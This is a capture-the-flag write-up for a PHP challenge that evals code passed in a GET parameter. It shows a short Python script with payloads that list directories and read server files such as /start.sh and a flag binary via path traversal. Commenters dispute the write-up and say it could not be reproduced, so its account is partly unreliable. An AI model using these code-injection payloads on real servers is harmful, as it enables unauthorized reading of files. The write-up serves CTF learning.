Tags: web php 

Rating: 2.0

This was a php challenge where the website would just eval the code you provided in the get request.
At first I thought about using something like system or exec, but those functions and others like shell_exec were disabled.
We can verify that by executing ```phpinfo();``` and checking the functions listed in ```disabled_function``` class.
So running any clever system code or something like a shell was out of question.
Also look out for `open_basedir` in the php configuration you get from `phpinfo();`. Luckily for us it was set to `/` so we could explore the file system easily.

Using ` __DIR__ `, `scandir`, we can quickly check which subdirectory the website is running. There was only `index.php` in `/var/www/html`.
In the `/` directory, we will find `flag.so` and `flag.h` (along with `.dockerenv` folder, `start.sh`) , catting out `flag.so` (you can use `highlight_file`) will give the flag as it was hardcoded in the binary.

`FLAG : flag{FFi_1s_qu1T3_DANg1ouS}`

import requests
url = "http://pwnable.org:19260"
# payload = """echo $s = base64_encode(readfile("../../../flag.so"));"""
# payload = """$f = scandir("/var/www/html");var_dump($f);"""
# payload = """$f = highlight_file('/start.sh');var_dump($f);"""
r = requests.Session()
s = r.get(url+"?rh="+payload)
final = s.text

DaviciiJune 29, 2020, 1:45 p.m.

The open_bsedir is showing /var/www/http and not /.
I also can't access the var or www dir through scandir.
How did you get it? Can you give some more details please

iqnoJune 29, 2020, 3:49 p.m.

Could you elaborate a bit more oh how you were able to read outside of the /var/www/http directory?
$t = scandir("/"); var_dump($t); evaluates to bool(false) as the www-data user presumably doesn't have the permissions to read anywhere except /var/www/http.
And as the previous comment mentions, the open_basedir is set to /var/www/html ?

ScalpelJune 29, 2020, 5:28 p.m.

I think this might have been the unintended solution. I got the same solution, but only once. Was not reproducible, because all the other times I tried the / directory was empty. Only one time I was able to list contents of the files in /

There was a new challenge, noeasyphp, that was put up during the competition because of instability of easyphp.

IsopachJune 30, 2020, 8:42 a.m.

Your solution probably depended on someone else with a bypass trying to solve the challenge, which is why it doesn't work anymore.